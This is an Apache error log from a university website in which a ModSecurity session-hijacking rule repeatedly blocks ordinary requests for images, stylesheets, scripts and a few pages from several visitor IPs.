[Mon Aug 28 08:34:38.006509 2023] [:error] [pid 38499] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOv5rsCo-f0AAJZjwBcAAAAC"]
[Mon Aug 28 08:34:38.006896 2023] [:error] [pid 38386] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOv5rsCo-f0AAJXyOIEAAAAM"]
[Mon Aug 28 08:34:38.007583 2023] [:error] [pid 38389] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOv5rsCo-f0AAJX1ku0AAAAS"]
[Mon Aug 28 08:34:38.011881 2023] [:error] [pid 38502] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOv5rsCo-f0AAJZmo4gAAAAA"]
[Mon Aug 28 08:34:38.021147 2023] [:error] [pid 38500] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOv5rsCo-f0AAJZkdnYAAAAD"]
[Mon Aug 28 08:34:38.021315 2023] [:error] [pid 38065] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOv5rsCo-f0AAJSxZFIAAAAH"]
[Mon Aug 28 08:34:38.057111 2023] [:error] [pid 38379] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOv5rsCo-f0AAJXrI4EAAAAP"]
[Mon Aug 28 08:34:38.059705 2023] [:error] [pid 38502] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOv5rsCo-f0AAJZmo4kAAAAA"]
[Mon Aug 28 08:34:38.067563 2023] [:error] [pid 38503] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv5rsCo-f0AAJZnSMAAAAAB"]
[Mon Aug 28 08:34:38.068505 2023] [:error] [pid 38499] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOv5rsCo-f0AAJZjwBgAAAAC"]
[Mon Aug 28 08:34:38.079462 2023] [:error] [pid 38065] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOv5rsCo-f0AAJSxZFMAAAAH"]
[Mon Aug 28 08:34:38.083752 2023] [:error] [pid 38114] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOv5rsCo-f0AAJTinv4AAAAE"]
[Mon Aug 28 08:34:38.198724 2023] [:error] [pid 38386] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5rsCo-f0AAJXyOIIAAAAM"]
[Mon Aug 28 08:34:45.190718 2023] [:error] [pid 38500] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv5tcCo-f0AAJZkdoQAAAAD"]
[Mon Aug 28 08:34:45.245546 2023] [:error] [pid 38114] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5tcCo-f0AAJTinwsAAAAE"]
[Mon Aug 28 08:34:46.263203 2023] [:error] [pid 38065] [client 114.122.103.110] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/bg-unla.png"] [unique_id "ZOv5tsCo-f0AAJSxZGQAAAAH"]
[Mon Aug 28 08:34:46.353142 2023] [:error] [pid 38389] [client 114.122.103.110] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOv5tsCo-f0AAJX1kvoAAAAS"]
[Mon Aug 28 08:35:04.274881 2023] [:error] [pid 38059] [client 114.122.103.110] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOv5yMCo-f0AAJSr3HIAAAAO"]
[Mon Aug 28 08:35:04.523689 2023] [:error] [pid 38503] [client 114.122.103.110] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5yMCo-f0AAJZnSPAAAAAB"]
[Mon Aug 28 08:35:09.998522 2023] [:error] [pid 38499] [client 114.122.103.110] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOv5zcCo-f0AAJZjwFQAAAAC"]
[Mon Aug 28 08:35:41.737248 2023] [:error] [pid 38503] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv57cCo-f0AAJZnST0AAAAB"]
[Mon Aug 28 08:35:41.738661 2023] [:error] [pid 38500] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv57cCo-f0AAJZkdvUAAAAD"]
[Mon Aug 28 08:35:41.806359 2023] [:error] [pid 38059] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv57cCo-f0AAJSr3MEAAAAO"]
[Mon Aug 28 08:35:41.806853 2023] [:error] [pid 38114] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv57cCo-f0AAJTin3QAAAAE"]
[Mon Aug 28 08:35:41.807441 2023] [:error] [pid 38499] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv57cCo-f0AAJZjwJ8AAAAC"]
[Mon Aug 28 08:35:41.815554 2023] [:error] [pid 38503] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv57cCo-f0AAJZnST4AAAAB"]
[Mon Aug 28 08:35:41.837490 2023] [:error] [pid 38303] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOv57cCo-f0AAJWfZWsAAAAI"]
[Mon Aug 28 08:35:41.842372 2023] [:error] [pid 38114] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv57cCo-f0AAJTin3UAAAAE"]
[Mon Aug 28 08:35:41.859086 2023] [:error] [pid 38503] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOv57cCo-f0AAJZnST8AAAAB"]
[Mon Aug 28 08:35:41.880684 2023] [:error] [pid 38114] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv57cCo-f0AAJTin3YAAAAE"]
[Mon Aug 28 08:35:41.920138 2023] [:error] [pid 38499] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv57cCo-f0AAJZjwKAAAAAC"]
[Mon Aug 28 08:36:17.917099 2023] [:error] [pid 38379] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/profil/pimpinan"] [unique_id "ZOv6EcCo-f0AAJXrJGUAAAAP"]
[Mon Aug 28 08:36:18.346927 2023] [:error] [pid 38389] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv6EsCo-f0AAJX1k3UAAAAS"]
[Mon Aug 28 08:36:48.534687 2023] [:error] [pid 38065] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/reset-min.css"] [unique_id "ZOv6MMCo-f0AAJSxZUIAAAAH"]
[Mon Aug 28 08:36:48.596827 2023] [:error] [pid 38303] [client 123.253.233.82] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style.css"] [unique_id "ZOv6MMCo-f0AAJWfZgMAAAAI"]
[Mon Aug 28 08:36:48.611861 2023] [:error] [pid 38059] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/jquery.fancybox-1.3.4.css"] [unique_id "ZOv6MMCo-f0AAJSr3XAAAAAO"]
[Mon Aug 28 08:36:48.612292 2023] [:error] [pid 38065] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/ddsmoothmenu.css"] [unique_id "ZOv6MMCo-f0AAJSxZUMAAAAH"]
[Mon Aug 28 08:36:48.646699 2023] [:error] [pid 38303] [client 123.253.233.82] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/nivo-slider.css"] [unique_id "ZOv6MMCo-f0AAJWfZgQAAAAI"]
[Mon Aug 28 08:36:48.660596 2023] [:error] [pid 38059] [client 123.253.233.82] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/gallery_album.css"] [unique_id "ZOv6MMCo-f0AAJSr3XEAAAAO"]
[Mon Aug 28 08:36:48.672529 2023] [:error] [pid 38114] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/ext-all.css"] [unique_id "ZOv6MMCo-f0AAJTioB4AAAAE"]
[Mon Aug 28 08:36:48.688242 2023] [:error] [pid 38303] [client 123.253.233.82] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/xtheme-gray.css"] [unique_id "ZOv6MMCo-f0AAJWfZgUAAAAI"]
[Mon Aug 28 08:36:48.726582 2023] [:error] [pid 38059] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOv6MMCo-f0AAJSr3XIAAAAO"]
[Mon Aug 28 08:36:48.742950 2023] [:error] [pid 38303] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOv6MMCo-f0AAJWfZgYAAAAI"]
[Mon Aug 28 08:36:48.780072 2023] [:error] [pid 38500] [client 123.253.233.82] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOv6MMCo-f0AAJZkd6YAAAAD"]
[Mon Aug 28 08:36:48.808351 2023] [:error] [pid 38389] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOv6MMCo-f0AAJX1k8MAAAAS"]
[Mon Aug 28 08:36:48.924846 2023] [:error] [pid 38379] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOv6MMCo-f0AAJXrJKEAAAAP"]
[Mon Aug 28 08:36:48.927453 2023] [:error] [pid 38538] [client 123.253.233.82] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOv6MMCo-f0AAJaKUfQAAAAF"]
[Mon Aug 28 08:36:55.462292 2023] [:error] [pid 38500] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/reset-min.css"] [unique_id "ZOv6N8Co-f0AAJZkd7cAAAAD"]
[Mon Aug 28 08:36:55.529540 2023] [:error] [pid 38303] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery-1.4.4.min.js"] [unique_id "ZOv6N8Co-f0AAJWfZh0AAAAI"]
[Mon Aug 28 08:36:55.784421 2023] [:error] [pid 38389] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/AC_RunActiveContent.js"] [unique_id "ZOv6N8Co-f0AAJX1k@AAAAAS"]
[Mon Aug 28 08:36:55.828591 2023] [:error] [pid 38303] [client 123.253.233.82] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.mousewheel-3.0.4.pack.js"] [unique_id "ZOv6N8Co-f0AAJWfZh8AAAAI"]
[Mon Aug 28 08:36:55.895602 2023] [:error] [pid 38059] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox-1.3.4.js"] [unique_id "ZOv6N8Co-f0AAJSr3YwAAAAO"]
[Mon Aug 28 08:36:55.943493 2023] [:error] [pid 38065] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/cufon-yui.js"] [unique_id "ZOv6N8Co-f0AAJSxZUsAAAAH"]
[Mon Aug 28 08:36:56.005409 2023] [:error] [pid 38114] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/Sansation_300-Sansation_700.font.js"] [unique_id "ZOv6OMCo-f0AAJTioDcAAAAE"]
[Mon Aug 28 08:37:02.860069 2023] [:error] [pid 38389] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/aslider.js"] [unique_id "ZOv6PsCo-f0AAJX1k@sAAAAS"]
[Mon Aug 28 08:37:03.044433 2023] [:error] [pid 38386] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/supersleight.plugin.js"] [unique_id "ZOv6P8Co-f0AAJXyOQkAAAAM"]
[Mon Aug 28 08:37:03.107142 2023] [:error] [pid 38500] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/adapter/ext/ext-base.js"] [unique_id "ZOv6P8Co-f0AAJZkd78AAAAD"]
[Mon Aug 28 08:37:03.174702 2023] [:error] [pid 38386] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/ext-all.css"] [unique_id "ZOv6P8Co-f0AAJXyOQoAAAAM"]
[Mon Aug 28 08:37:03.383086 2023] [:error] [pid 38114] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOv6P8Co-f0AAJTioEAAAAAE"]
[Mon Aug 28 08:37:03.383171 2023] [:error] [pid 38499] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOv6P8Co-f0AAJZjwUcAAAAC"]
[Mon Aug 28 08:37:03.453241 2023] [:error] [pid 38389] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOv6P8Co-f0AAJX1k@0AAAAS"]
[Mon Aug 28 08:37:03.474156 2023] [:error] [pid 38386] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ext-all.js"] [unique_id "ZOv6P8Co-f0AAJXyOQsAAAAM"]
